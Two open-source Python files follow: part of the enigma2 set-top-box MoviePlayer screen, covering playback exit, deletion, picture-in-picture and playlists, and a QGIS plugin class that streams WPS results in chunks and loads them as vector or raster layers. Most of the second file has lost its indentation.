        self["state"] = Label()
        self["speed"] = Label()
        self["statusicon"] = MultiPixmap()
        self["actions"] = HelpableActionMap(self, "MoviePlayerActions",
            {
                "leavePlayer": (self.leavePlayer, _("leave movie player...")),
                "leavePlayerOnExit": (self.leavePlayerOnExit, _("leave movie player..."))
            })
        self.allowPiP = True
        # Initialise every mixin that was not already set up above.
        for x in HelpableScreen, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \
                InfoBarBase, InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, \
                InfoBarAudioSelection, InfoBarNotifications, InfoBarSimpleEventView, \
                InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, \
                InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, \
                InfoBarTeletextPlugin, InfoBarServiceErrorPopupSupport, InfoBarExtensions, \
                InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarButtonSetup:
            x.__init__(self)
        self.onChangedEntry = [ ]
        self.servicelist = slist
        self.lastservice = lastservice or session.nav.getCurrentlyPlayingServiceOrGroup()
        session.nav.playService(service)
        self.cur_service = service
        self.returning = False
        self.onClose.append(self.__onClose)
        self.onShow.append(self.doButtonsCheck)
        self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
            {
                enigma.iPlayableService.evStart: self.__evStart
            })
        assert MoviePlayer.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!"
        MoviePlayer.instance = self
        # is needed for every first call of MoviePlayer
        self.__evStart()

    def __evStart(self):
        """On service start, schedule the audio-track auto-selection.

        A one-shot timer is used so the track info is available when
        switchAudio runs.
        """
        self.switchAudioTimer = enigma.eTimer()
        self.switchAudioTimer.callback.append(self.switchAudio)
        self.switchAudioTimer.start(750, True) # 750 is a safe-value

    def switchAudio(self):
        """Auto-select the audio track for file-based playback only."""
        service = self.session.nav.getCurrentlyPlayingServiceOrGroup()
        if service:
            # we go this way for other extensions as own records(they switch over pmt)
            path = service.getPath()
            import os
            ext = os.path.splitext(path)[1].lower()
            exts = [".mkv", ".avi", ".divx", ".mp4"] # we need more extensions here ?
            if ext.lower() in exts:
                service = self.session.nav.getCurrentService()
                if service:
                    setAudioTrack(service)

    def doButtonsCheck(self):
        """Refresh the coloured-button labels each time we are shown."""
        if config.plisettings.ColouredButtons.value:
            self["key_yellow"].setText(_("Extensions"))
            self["key_green"].setText(_("Green Panel"))
            self["key_blue"].setText(_("Blue Panel"))

    def __onClose(self):
        """Tear down the singleton and return to the previous service."""
        MoviePlayer.instance = None
        from Screens.MovieSelection import playlist
        del playlist[:]
        Screens.InfoBar.InfoBar.instance.callServiceStarted()
        self.session.nav.playService(self.lastservice)
        # Remember what was played so it can be resumed later.
        config.usage.last_movie_played.value = self.cur_service.toString()
        config.usage.last_movie_played.save()

    def handleLeave(self, how):
        """Handle leaving the player; *how* is either "ask" (show a
        choice box) or one of the leavePlayerConfirmed answer codes."""
        self.is_closing = True
        if how == "ask":
            if config.usage.setup_level.index < 2: # -expert
                list = (
                    (_("Yes"), "quit"),
                    (_("No"), "continue")
                )
            else:
                list = (
                    (_("Yes"), "quit"),
                    (_("Yes, returning to movie list"), "movielist"),
                    (_("Yes, and delete this movie"), "quitanddelete"),
                    (_("Yes, delete this movie and return to movie list"), "deleteandmovielist"),
                    (_("No"), "continue"),
                    (_("No, but restart from begin"), "restart")
                )
            from Screens.ChoiceBox import ChoiceBox
            self.session.openWithCallback(self.leavePlayerConfirmed, ChoiceBox, title=_("Stop playing this movie?"), list = list)
        else:
            self.leavePlayerConfirmed([True, how])

    def leavePlayer(self):
        """Stop playback, remembering the resume position first."""
        setResumePoint(self.session)
        self.handleLeave(config.usage.on_movie_stop.value)

    def leavePlayerOnExit(self):
        """EXIT key: hide the infobar first, then handle PiP / player
        exit according to the configured behaviour."""
        if self.shown:
            self.hide()
        elif self.session.pipshown and "popup" in config.usage.pip_hideOnExit.value:
            if config.usage.pip_hideOnExit.value == "popup":
                self.session.openWithCallback(self.hidePipOnExitCallback, MessageBox, _("Disable Picture in Picture"), simple=True)
            else:
                self.hidePipOnExitCallback(True)
        elif config.usage.leave_movieplayer_onExit.value == "popup":
            self.session.openWithCallback(self.leavePlayerOnExitCallback, MessageBox, _("Exit movie player?"), simple=True)
        elif config.usage.leave_movieplayer_onExit.value == "without popup":
            self.leavePlayerOnExitCallback(True)
        elif config.usage.leave_movieplayer_onExit.value == "stop":
            self.leavePlayer()

    def leavePlayerOnExitCallback(self, answer):
        # Confirmation callback for the "Exit movie player?" popup.
        if answer:
            setResumePoint(self.session)
            self.handleLeave("quit")

    def hidePipOnExitCallback(self, answer):
        # Confirmation callback for disabling PiP (showPiP toggles it off).
        if answer:
            self.showPiP()

    def deleteConfirmed(self, answer):
        # Confirmation callback for "delete and quit".
        if answer:
            self.leavePlayerConfirmed((True, "quitanddeleteconfirmed"))

    def deleteAndMovielistConfirmed(self, answer):
        # Confirmation callback for "delete and return to movie list".
        if answer:
            self.leavePlayerConfirmed((True, "deleteandmovielistconfirmed"))

    def movielistAgain(self):
        """Drop the playlist, restore the previous service and reopen
        the movie list."""
        from Screens.MovieSelection import playlist
        del playlist[:]
        self.session.nav.playService(self.lastservice)
        self.leavePlayerConfirmed((True, "movielist"))

    def leavePlayerConfirmed(self, answer):
        """Dispatch on the answer code chosen in handleLeave's choice
        box (quit / movielist / delete variants / restart / playlist
        handling / repeat)."""
        answer = answer and answer[1]
        if answer is None:
            return
        if answer in ("quitanddelete", "quitanddeleteconfirmed", "deleteandmovielist", "deleteandmovielistconfirmed"):
            ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
            serviceHandler = enigma.eServiceCenter.getInstance()
            if answer in ("quitanddelete", "deleteandmovielist"):
                msg = ''
                if config.usage.movielist_trashcan.value:
                    import Tools.Trashcan
                    try:
                        trash = Tools.Trashcan.createTrashFolder(ref.getPath())
                        Screens.MovieSelection.moveServiceFiles(ref, trash)
                        # Moved to trash, okay
                        if answer == "quitanddelete":
                            self.close()
                        else:
                            self.movielistAgain()
                        return
                    except Exception, e:
                        print "[InfoBar] Failed to move to .Trash folder:", e
                        msg = _("Cannot move to trash can") + "\n" + str(e) + "\n"
                # Trashcan failed or disabled: ask for a hard delete.
                info = serviceHandler.info(ref)
                name = info and info.getName(ref) or _("this recording")
                msg += _("Do you really want to delete %s?") % name
                if answer == "quitanddelete":
                    self.session.openWithCallback(self.deleteConfirmed, MessageBox, msg)
                elif answer == "deleteandmovielist":
                    self.session.openWithCallback(self.deleteAndMovielistConfirmed, MessageBox, msg)
                return
            elif answer in ("quitanddeleteconfirmed", "deleteandmovielistconfirmed"):
                offline = serviceHandler.offlineOperations(ref)
                if offline.deleteFromDisk(0):
                    # Delete failed; report and bail out of this branch.
                    self.session.openWithCallback(self.close, MessageBox, _("You cannot delete this!"), MessageBox.TYPE_ERROR)
                    if answer == "deleteandmovielistconfirmed":
                        self.movielistAgain()
                    return
        if answer in ("quit", "quitanddeleteconfirmed"):
            self.close()
        elif answer in ("movielist", "deleteandmovielistconfirmed"):
            if config.movielist.stop_service.value:
                ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
            else:
                ref = self.lastservice
            self.returning = True
            self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, ref)
            self.session.nav.stopService()
            if not config.movielist.stop_service.value:
                self.session.nav.playService(self.lastservice)
        elif answer == "restart":
            self.doSeek(0)
            self.setSeekState(self.SEEK_STATE_PLAY)
        elif answer in ("playlist","playlistquit","loop"):
            ( next_service, item , length ) = self.getPlaylistServiceInfo(self.cur_service)
            if next_service is not None:
                if config.usage.next_movie_msg.value:
                    self.displayPlayedName(next_service, item, length)
                self.session.nav.playService(next_service)
                self.cur_service = next_service
            else:
                # End of playlist: return to list, loop, or quit.
                if answer == "playlist":
                    self.leavePlayerConfirmed([True,"movielist"])
                elif answer == "loop" and length > 0:
                    self.leavePlayerConfirmed([True,"loop"])
                else:
                    self.leavePlayerConfirmed([True,"quit"])
        elif answer in "repeatcurrent":
            # NOTE(review): 'in' on a string is a substring test, so any
            # substring of "repeatcurrent" (e.g. "repeat") also matches;
            # presumably answer == "repeatcurrent" was intended - confirm.
            if config.usage.next_movie_msg.value:
                # NOTE(review): in repeatcurrent mode getPlaylistServiceInfo
                # returns a 2-tuple (position, length) - see that method.
                (item, length) = self.getPlaylistServiceInfo(self.cur_service)
                self.displayPlayedName(self.cur_service, item, length)
            self.session.nav.stopService()
            self.session.nav.playService(self.cur_service)

    def doEofInternal(self, playing):
        """End-of-file hook: clear the resume point and apply the
        configured end-of-movie behaviour."""
        if not self.execing:
            return
        if not playing:
            return
        ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
        if ref:
            delResumePoint(ref)
        self.handleLeave(config.usage.on_movie_eof.value)

    def up(self):
        """UP key: zap up in PiP mode, otherwise open the movie list."""
        slist = self.servicelist
        if slist and slist.dopipzap:
            if "keep" not in config.usage.servicelist_cursor_behavior.value:
                slist.moveUp()
            self.session.execDialog(slist)
        else:
            self.showMovies()

    def down(self):
        """DOWN key: zap down in PiP mode, otherwise open the movie list."""
        slist = self.servicelist
        if slist and slist.dopipzap:
            if "keep" not in config.usage.servicelist_cursor_behavior.value:
                slist.moveDown()
            self.session.execDialog(slist)
        else:
            self.showMovies()

    def right(self):
        """RIGHT key: zap down when PiP-zapping, otherwise seek forward."""
        # XXX: gross hack, we do not really seek if changing channel in pip :-)
        slist = self.servicelist
        if slist and slist.dopipzap:
            # XXX: We replicate InfoBarChannelSelection.zapDown here - we shouldn't do that
            if slist.inBouquet():
                prev = slist.getCurrentSelection()
                if prev:
                    prev = prev.toString()
                    while True:
                        if config.usage.quickzap_bouquet_change.value and slist.atEnd():
                            slist.nextBouquet()
                        else:
                            slist.moveDown()
                        cur = slist.getCurrentSelection()
                        # Stop on a playable entry (flag 64 = marker) or
                        # once we have wrapped around to where we started.
                        if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
                            break
            else:
                slist.moveDown()
            slist.zap(enable_pipzap = True)
        else:
            InfoBarSeek.seekFwd(self)

    def left(self):
        """LEFT key: zap up when PiP-zapping, otherwise seek back."""
        slist = self.servicelist
        if slist and slist.dopipzap:
            # XXX: We replicate InfoBarChannelSelection.zapUp here - we shouldn't do that
            if slist.inBouquet():
                prev = slist.getCurrentSelection()
                if prev:
                    prev = prev.toString()
                    while True:
                        if config.usage.quickzap_bouquet_change.value:
                            if slist.atBegin():
                                slist.prevBouquet()
                        slist.moveUp()
                        cur = slist.getCurrentSelection()
                        # Stop on a playable entry (flag 64 = marker) or
                        # once we have wrapped around to where we started.
                        if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
                            break
            else:
                slist.moveUp()
            slist.zap(enable_pipzap = True)
        else:
            InfoBarSeek.seekBack(self)

    def showPiP(self):
        """Toggle picture-in-picture on/off."""
        slist = self.servicelist
        if self.session.pipshown:
            if slist and slist.dopipzap:
                slist.togglePipzap()
            if self.session.pipshown:
                del self.session.pip
                self.session.pipshown = False
        else:
            service = self.session.nav.getCurrentService()
            info = service and service.info()
            xres = str(info.getInfo(enigma.iServiceInformation.sVideoWidth))
            # NOTE(review): HD PiP is refused only on 'blackbox7405'
            # hardware when the current video is wider than 720px.
            if int(xres) <= 720 or not getMachineBuild() == 'blackbox7405':
                from Screens.PictureInPicture import PictureInPicture
                self.session.pip = self.session.instantiateDialog(PictureInPicture)
                self.session.pip.show()
                if self.session.pip.playService(slist.getCurrentSelection()):
                    self.session.pipshown = True
                    self.session.pip.servicePath = slist.getCurrentServicePath()
                else:
                    # PiP service failed to start; roll back.
                    self.session.pipshown = False
                    del self.session.pip
            else:
                self.session.open(MessageBox, _("Your %s %s does not support PiP HD") % (getMachineBrand(), getMachineName()), type = MessageBox.TYPE_INFO,timeout = 5 )

    def movePiP(self):
        """Move the PiP window (only when PiP is active)."""
        if self.session.pipshown:
            InfoBarPiP.movePiP(self)

    def swapPiP(self):
        # Swapping main picture and PiP is not supported in the movie player.
        pass

    def showMovies(self):
        """Open the movie list, remembering the service to resume."""
        ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
        if ref and ':0:/' not in ref.toString():
            self.playingservice = ref # movie list may change the currently playing
        else:
            self.playingservice = enigma.eServiceReference(config.movielist.curentlyplayingservice.value)
        self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, ref)

    def movieSelected(self, service):
        """Callback from the movie list: play the chosen service, close
        if we were returning, or resume what was playing before."""
        if service is not None:
            self.cur_service = service
            self.is_closing = False
            self.session.nav.playService(service)
            self.returning = False
        elif self.returning:
            self.close()
        else:
            self.is_closing = False
            try:
                ref = self.playingservice
                del self.playingservice
                # no selection? Continue where we left off
                if ref and not self.session.nav.getCurrentlyPlayingServiceOrGroup():
                    self.session.nav.playService(ref)
            except:
                pass

    def getPlaylistServiceInfo(self, service):
        """Locate *service* in the playlist.

        Returns (next_service, position, length); when on_movie_eof is
        "repeatcurrent" it instead returns just (position, length), and
        (None, 0, 0) when the service is not found or the list is done.
        """
        from MovieSelection import playlist
        for i, item in enumerate(playlist):
            if item == service:
                if config.usage.on_movie_eof.value == "repeatcurrent":
                    return i+1, len(playlist)
                i += 1
                if i < len(playlist):
                    return playlist[i], i+1, len(playlist)
                elif config.usage.on_movie_eof.value == "loop":
                    return playlist[0], 1, len(playlist)
        return None, 0, 0

    def displayPlayedName(self, ref, index, n):
        """Show a popup "index/n: name" for the service about to play."""
        from Tools import Notifications
        Notifications.AddPopup(text = _("%s/%s: %s") % (index, n, self.ref2HumanName(ref)), type = MessageBox.TYPE_INFO, timeout = 5)

    def ref2HumanName(self, ref):
        """Return the human-readable name of a service reference."""
        return enigma.eServiceCenter.getInstance().info(ref).getName(ref)
| formiano/enigma2 | lib/python/Screens/InfoBar.py | Python | gpl-2.0 | 33,112 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Client for streaming based WPS.
It exploits asynchronous capabilities of WPS and QGIS for visualizing
intermediate results from a WPS
-------------------
copyright : (C) 2012 by Germán Carrillo (GeoTux)
email : geotux_tuxman@linuxmail.org
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import QColor, QMessageBox
from PyQt4.QtNetwork import QNetworkRequest, QNetworkAccessManager
from qgis.core import (QgsNetworkAccessManager, QgsVectorLayer, QgsRasterLayer,
QgsMapLayerRegistry, QgsFeature, QgsGeometry)
from qgis.gui import QgsRubberBand, QgsVertexMarker
from wpslib.processdescription import getFileExtension,isMimeTypeVector,isMimeTypeRaster
from wpslib.executionresult import decodeBase64
from functools import partial
import apicompat
import tempfile
import os, platform
import glob
class Streaming(QObject):
""" Class for keeping track of stream chunks and
providing methods for handling and visualizing them
"""
# Define SIGNALS/SLOTS
playlistHandled = pyqtSignal(dict)
urlReady = pyqtSignal(str, int, str)
dataReady = pyqtSignal(str, int)
def __init__(self, parent, iface, chunks, playlistUrl, mimeType, encoding):
super(Streaming, self).__init__()
self.DEBUG = True
# Variables from other classes
self.parent = parent # For GUI access
self.iface = iface
self.chunks = chunks
self.playlistUrl = playlistUrl
self.mimeType = mimeType
self.encoding = encoding
# Internal variables
self.__endTag = "#PLAYLIST-END"
self.__exceptionTag = "#EXCEPTION"
self.__exceptionUrl = ""
self.__exceptionFound = False
self.__playlistFinished = False # Did the end tag appeared?
self.__bytesInlastReply = 0 # To compare last and current reply sizes
self.__loadedChunks = 0 # For keeping track of # of loaded (to local vars) chunks
self.__deliveredChunks = 0 # For keeping track of # of loaded (to the map) chunks
self.__bFirstChunk = True
self.__features = {} # {0:[f0,f1,f2], 1:[f0,f1]}
self.__bGeomMulti = False # Is the geometry multi{point|line|polygon}
self.__geometryType = "" # Values: "Point","LineString","Polygon","Unknown", "NoGeometry"
self.__tmpGeometry = {} # For visualization purposes {chunkId1: rb1, chunkId2: rb2 }
self.__memoryLayer = None # The whole merged data
# For rasters only
self.__legend = self.iface.legendInterface()
self.__groupIndex = 0
self.__chunksDir = None
self.__virtualFile = "" # Virtual raster file path
if isMimeTypeRaster(self.mimeType, True) != None:
self.__chunksDir = tempfile.mkdtemp(prefix="tmpChunks")
# Other objects
self.timer = QTimer()
self.timer.setInterval(1 * 1000) # 1 second
self.QNAM4Playlist = QNetworkAccessManager()
self.QNAM4Chunks = QNetworkAccessManager()
self.QNAM4Exception = QNetworkAccessManager()
# SIGNAL/SLOT connections
self.playlistHandled.connect(self.fetchChunks)
self.urlReady.connect(self.fetchResult)
self.dataReady.connect(self.loadData)
self.timer.timeout.connect(partial(self.fetchPlaylist, self.playlistUrl))
self.QNAM4Playlist.finished.connect(self.handlePlaylist)
self.QNAM4Chunks.finished.connect(self.handleChunk)
self.QNAM4Exception.finished.connect(self.handleException)
#self.QNAM4Playlist = QgsNetworkAccessManager.instance()
#theReply2.error.connect(self.handleErrors)
# GUI
self.parent.progressBar.setRange(0,0)
self.parent.lblProcess.setText("Reading output playlist...")
def start(self):
""" Start fetching """
self.fetchPlaylist(self.playlistUrl) # First call
def stop(self):
""" Stop fetching """
self.timer.stop()
self.QNAM4Playlist.finished.disconnect(self.handlePlaylist)
self.QNAM4Chunks.finished.disconnect(self.handleChunk)
self.removeTempGeometry(self.__geometryType)
if self.DEBUG: print "Stop streaming!"
def validateCompletedStream(self):
""" Is the stream complete (Did the end tag appeared?) """
#return (self.__loadedChunks >= self.chunks and self.chunks != 0)
return self.__playlistFinished
def allChunksDelivered(self):
""" Are all chunks already loaded into the map? """
return ((self.__loadedChunks == self.__deliveredChunks and
self.__playlistFinished) or self.__exceptionFound)
def fetchPlaylist(self, playlistLink):
url = QUrl(playlistLink)
self.QNAM4Playlist.get(QNetworkRequest(url)) # SLOT: handlePlaylist
def handlePlaylist(self, reply):
""" Parse the chunk URLs and update the loadedChunks counter """
# Check if there is redirection
reDir = reply.attribute(QNetworkRequest.RedirectionTargetAttribute).toUrl()
if not reDir.isEmpty():
self.fetchPlaylist(reDir.toString())
return
# Parse URLs only if there is new data in the reply
if reply.bytesAvailable() > self.__bytesInlastReply:
if self.DEBUG: print " Parsing the playlist..."
startFrom = reply.bytesAvailable() - self.__bytesInlastReply # Delta in bytes
self.__bytesInlastReply = reply.bytesAvailable()
newURLs = self.parseURLs(reply, startFrom)
else:
if self.DEBUG: print " No new data in the playlist..."
newURLs = {}
# Store new URLs
if len(newURLs) > 0:
self.__loadedChunks += len(newURLs)
if self.chunks:
self.parent.progressBar.setRange(0,self.chunks)
if self.DEBUG: print str(self.__loadedChunks) + " chunks loaded" + ((" out of " + str(self.chunks)) if self.chunks else "")
# If not complete, make additional calls
if not self.validateCompletedStream():
if not self.timer.isActive():
self.timer.start()
if self.DEBUG: print "Timer started..."
else:
self.timer.stop()
self.QNAM4Playlist.finished.disconnect(self.handlePlaylist)
if self.DEBUG: print "Playlist finished!"
if self.allChunksDelivered():
self.finishLoading()
if self.__exceptionFound:
self.fetchException()
if len(newURLs) > 0:
self.playlistHandled.emit(newURLs) # SLOT: fetchChunks
def parseURLs(self, reply, startFrom):
""" Get a dict of new IDs:URLs from the current playlist (newURLs) """
newURLs = {} # {0:URL0, 1:URL1, ...}
count = 0
#Get the delta and start reading it
allData = reply.readAll()
allData = allData.right(startFrom) # Get rid of old data
response = QTextStream(allData, QIODevice.ReadOnly)
data = response.readLine()
# Parse
while (data):
data = str(data.split("\n")[0])
if data:
if "#" in data: # It's a playlist comment
if self.__endTag in data:
self.__playlistFinished = True
elif self.__exceptionTag in data:
if self.DEBUG: print "Exception found!"
self.__exceptionFound = True
self.__exceptionUrl = data.split(":",1)[1].strip()
else:
newURLs[count+self.__loadedChunks] = data
count += 1
data = response.readLine()
return newURLs
def fetchChunks(self, newURLs):
""" Fetch each url """
for chunkId in newURLs:
self.urlReady.emit(self.encoding, chunkId, newURLs[chunkId]) # SLOT: fetchResult
def fetchResult(self, encoding, chunkId, fileLink):
""" Send the GET request """
url = QUrl(fileLink)
theReply2 = self.QNAM4Chunks.get(QNetworkRequest(url))
theReply2.setProperty("chunkId", pystring(chunkId))
theReply2.setProperty("encoding", pystring(encoding))
def handleErrors(self, error): # TODO connect it
if self.DEBUG: print "ERROR!!!", error
def fetchException(self):
""" Send the GET request for the exception """
url = QUrl(self.__exceptionUrl)
theReply3 = self.QNAM4Exception.get(QNetworkRequest(url))
def handleException(self, reply):
""" Display the exception """
# Check if there is redirection
reDir = reply.attribute(QNetworkRequest.RedirectionTargetAttribute).toUrl()
if not reDir.isEmpty():
self.__exceptionUrl = reDir.toString()
self.fetchException()
return
resultXML = reply.readAll().data()
self.parent.setStatusLabel('error')
self.parent.progressBar.setMinimum(0)
self.parent.progressBar.setMaximum(100)
self.parent.errorHandler(resultXML)
def handleChunk(self, reply):
""" Store the file received """
#reply.deleteLater() # Recommended way to delete the reply
chunkId = reply.property("chunkId").toInt()[0]
encoding = reply.property("encoding").toString()
# Check if there is redirection
reDir = reply.attribute(QNetworkRequest.RedirectionTargetAttribute).toUrl()
if not reDir.isEmpty():
self.urlReady.emit(encoding, chunkId, reDir.toString())
return
if self.DEBUG: print "GET chunk", chunkId
# Update progressBar
if self.chunks:
self.parent.progressBar.setValue(self.__deliveredChunks + 1)
self.parent.lblProcess.setText("Downloading chunks... ("+str(self.__deliveredChunks + 1)+"/"+str(self.chunks)+")")
# Get a unique temporary file name
tmpFile = tempfile.NamedTemporaryFile(prefix="base64",
suffix=getFileExtension(self.mimeType), dir=self.__chunksDir, delete=False )
# TODO: Check if the file name already exists!!!
# Write the data to the temporary file
outFile = QFile(tmpFile.name)
outFile.open(QIODevice.WriteOnly)
outFile.write(reply.readAll())
outFile.close()
# Decode?
if encoding == "base64":
resultFile = decodeBase64(tmpFile.name, self.mimeType, self.__chunksDir)
else:
resultFile = tmpFile.name
# Finally, load the data
if self.DEBUG: print "READY to be loaded (", resultFile, ", chunkId:", chunkId, ")"
self.dataReady.emit(resultFile, chunkId) # SLOT: loadData
def loadData(self, resultFile, chunkId):
""" Load data to the map """
if isMimeTypeVector(self.mimeType, True) != None:
# Memory layer:
geometryTypes = ["Point","LineString","Polygon","Unknown", "NoGeometry"]
vlayer = QgsVectorLayer(resultFile, "chunk", "ogr")
if self.__bFirstChunk:
self.__bFirstChunk = False
self.__geometryType = geometryTypes[vlayer.geometryType()]
self.__bGeomMulti = vlayer.wkbType() in [4,5,6,11,12,13]
self.__memoryLayer = QgsVectorLayer(self.__geometryType,"Streamed data","memory")
self.__memoryLayer.dataProvider().addAttributes(vlayer.pendingFields().values())
self.__memoryLayer.updateFieldMap()
provider = vlayer.dataProvider()
allAttrs = provider.attributeIndexes()
vlayer.select(allAttrs)
# Visualize temporal geometries during the downloading process
# Don't add temporal geometries if last chunk
if self.DEBUG: print "Loaded chunkId:",chunkId
res = self.__memoryLayer.dataProvider().addFeatures( [feat for feat in vlayer] )
self.__deliveredChunks += 1
if not self.allChunksDelivered():
inFeat = QgsFeature()
inGeom = QgsGeometry()
self.createTempGeometry(chunkId, self.__geometryType)
while provider.nextFeature( inFeat ):
inGeom = inFeat.geometry()
featList = self.extractAsSingle(self.__geometryType, inGeom) if self.__bGeomMulti else [inGeom]
for geom in featList:
self.addTempGeometry(chunkId, self.__geometryType, geom)
else:
self.finishLoading()
# Raster data
elif isMimeTypeRaster(self.mimeType, True) != None:
# We can directly attach the new layer
if self.__bFirstChunk:
self.__bFirstChunk = False
self.__groupIndex = self.__legend.addGroup("Streamed-raster")
rLayer = QgsRasterLayer(resultFile, "raster_"+str(chunkId))
bLoaded = QgsMapLayerRegistry.instance().addMapLayer(rLayer)
self.stretchRaster(rLayer)
self.__legend.moveLayer(rLayer, self.__groupIndex + 1)
self.__deliveredChunks += 1
if self.allChunksDelivered():
self.finishLoading()
def finishLoading(self):
""" Finish the loading process, load the definite assembled layer """
if self.DEBUG: print "DONE!"
if not self.__bFirstChunk:
if isMimeTypeVector(self.mimeType, True) != None:
self.removeTempGeometry(self.__geometryType)
QgsMapLayerRegistry.instance().addMapLayer(self.__memoryLayer)
elif isMimeTypeRaster(self.mimeType, True) != None:
self.parent.lblProcess.setText("All tiles are loaded. Merging them...")
# Generate gdal virtual raster
# Code adapted from GdalTools (C) 2009 by L. Masini and G. Sucameli (Faunalia)
self.process = QProcess(self)
self.connect(self.process, SIGNAL("finished(int, QProcess::ExitStatus)"),
self.loadVirtualRaster)
#self.setProcessEnvironment(self.process) Required in Windows?
cmd = "gdalbuildvrt"
arguments = pystringlist()
if platform.system() == "Windows" and cmd[-3:] == ".py":
command = cmd[:-3] + ".bat"
else:
command = cmd
tmpFile = tempfile.NamedTemporaryFile(prefix="virtual",
suffix=".vrt")
self.__virtualFile = tmpFile.name
arguments.append(self.__virtualFile)
rasters = self.getRasterFiles(self.__chunksDir,
getFileExtension(self.mimeType))
for raster in rasters:
arguments.append(raster)
self.process.start(command, arguments, QIODevice.ReadOnly)
if not self.__exceptionFound:
self.parent.setStatusLabel('finished')
self.parent.progressBar.setRange(0,100)
self.parent.progressBar.setValue(100)
def createTempGeometry(self, chunkId, geometryType):
""" Create rubber bands for rapid visualization of geometries """
if geometryType == "Polygon":
self.__tmpGeometry[chunkId] = QgsRubberBand(self.iface.mapCanvas(), True)
self.__tmpGeometry[chunkId].setColor( QColor( 0,255,0,255 ) )
self.__tmpGeometry[chunkId].setWidth( 2 )
if self.DEBUG: print "rubberBand created"
elif geometryType == "LineString":
self.__tmpGeometry[chunkId] = QgsRubberBand(self.iface.mapCanvas(), False)
self.__tmpGeometry[chunkId].setColor( QColor( 255,121,48,255 ) )
self.__tmpGeometry[chunkId].setWidth( 3 )
elif geometryType == "Point":
# In the case of points, they will be added as vertex objects later
self.__tmpGeometry[chunkId] = []
def addTempGeometry(self, chunkId, geometryType, geometry):
""" Add geometries as rubber bands or vertex objects """
if geometryType == "Polygon" or geometryType == "LineString":
self.__tmpGeometry[chunkId].addGeometry(geometry, None)
elif geometryType == "Point":
vertex = QgsVertexMarker(self.iface.mapCanvas())
vertex.setCenter(geometry.asPoint())
vertex.setColor(QColor(0,255,0))
vertex.setIconSize(6)
vertex.setIconType(QgsVertexMarker.ICON_BOX) # or ICON_CROSS, ICON_X
vertex.setPenWidth(3)
self.__tmpGeometry[chunkId].append(vertex)
def removeTempGeometry(self, geometryType):
""" Remove rubber bands or vertex objects from the map """
if geometryType == "Polygon" or geometryType == "LineString":
for chunkId in self.__tmpGeometry.keys():
self.iface.mapCanvas().scene().removeItem(self.__tmpGeometry[chunkId])
del self.__tmpGeometry[chunkId]
elif geometryType == "Point":
for chunkId in self.__tmpGeometry.keys():
if len( self.__tmpGeometry[chunkId] ) > 0:
for vertex in self.__tmpGeometry[chunkId]:
self.iface.mapCanvas().scene().removeItem(vertex)
del vertex
def extractAsSingle(self, geometryType, geom):
""" Extract multi geometries as single ones.
Required because of a QGIS bug regarding multipolygons and rubber bands
"""
# Code adapted from QGIS fTools plugin, (C) 2008-2011 Carson Farmer
multi_geom = QgsGeometry()
temp_geom = []
if geometryType == "Point":
multi_geom = geom.asMultiPoint()
for i in multi_geom:
temp_geom.append( QgsGeometry().fromPoint ( i ) )
elif geometryType == "LineString":
multi_geom = geom.asMultiPolyline()
for i in multi_geom:
temp_geom.append( QgsGeometry().fromPolyline( i ) )
elif geometryType == "Polygon":
multi_geom = geom.asMultiPolygon()
for i in multi_geom:
temp_geom.append( QgsGeometry().fromPolygon( i ) )
return temp_geom
def loadVirtualRaster(self, exitCode, status):
""" Load a virtual raster to QGIS """
if exitCode == 0:
self.__legend.setGroupVisible( self.__groupIndex, False )
rLayer = QgsRasterLayer(self.__virtualFile, "virtual")
bLoaded = QgsMapLayerRegistry.instance().addMapLayer(rLayer)
self.stretchRaster(rLayer)
self.process.kill()
def stretchRaster(self, raster):
raster.setMinimumMaximumUsingLastExtent()
raster.setContrastEnhancementAlgorithm(1)
raster.triggerRepaint()
    def setProcessEnvironment(self, process):
        """ From GdalTools. Set environment variables for running gdalbuildvrt """
        # Variables the GDAL tools need; values come from the plugin settings.
        envvar_list = {
            "PATH" : self.getGdalBinPath(),
            "PYTHONPATH" : self.getGdalPymodPath()
        }
        if self.DEBUG: print envvar_list
        sep = os.pathsep
        for name, val in envvar_list.iteritems():
            # Skip unset/blank settings.
            if val == None or val == "":
                continue
            envval = os.getenv(name)
            if envval == None or envval == "":
                # Variable not set yet: use our value as-is.
                envval = str(val)
            elif not pystring( envval ).split( sep ).contains( val, Qt.CaseInsensitive ):
                # Append our path only when it is not already on the list
                # (case-insensitive comparison).
                envval += "%s%s" % (sep, str(val))
            else:
                # Already present; nothing to update.
                envval = None
            if envval != None:
                os.putenv( name, envval )
            # NOTE(review): dead code below (guarded by `if False`); it also
            # references an undefined name `gdalPath` -- it would crash if
            # ever re-enabled.
            if False: # not needed because os.putenv() has already updated the environment for new child processes
                env = QProcess.systemEnvironment()
                if env.contains( QRegExp( "^%s=(.*)" % name, Qt.CaseInsensitive ) ):
                    env.replaceInStrings( QRegExp( "^%s=(.*)" % name, Qt.CaseInsensitive ), "%s=\\1%s%s" % (name, sep, gdalPath) )
                else:
                    env << "%s=%s" % (name, val)
                process.setEnvironment( env )
def getRasterFiles(self, dir, extension):
rasters = pystringlist()
for name in glob.glob(dir + '/*' + extension):
rasters.append(name)
return rasters
    def getGdalBinPath(self):
        """ Retrieves GDAL binaries location """
        # Stored by the GdalTools plugin; .toString() unwraps the QVariant
        # (PyQt4 API v1), defaulting to an empty string when unset.
        settings = QSettings()
        return settings.value( "/GdalTools/gdalPath", pystring( "" ) ).toString()
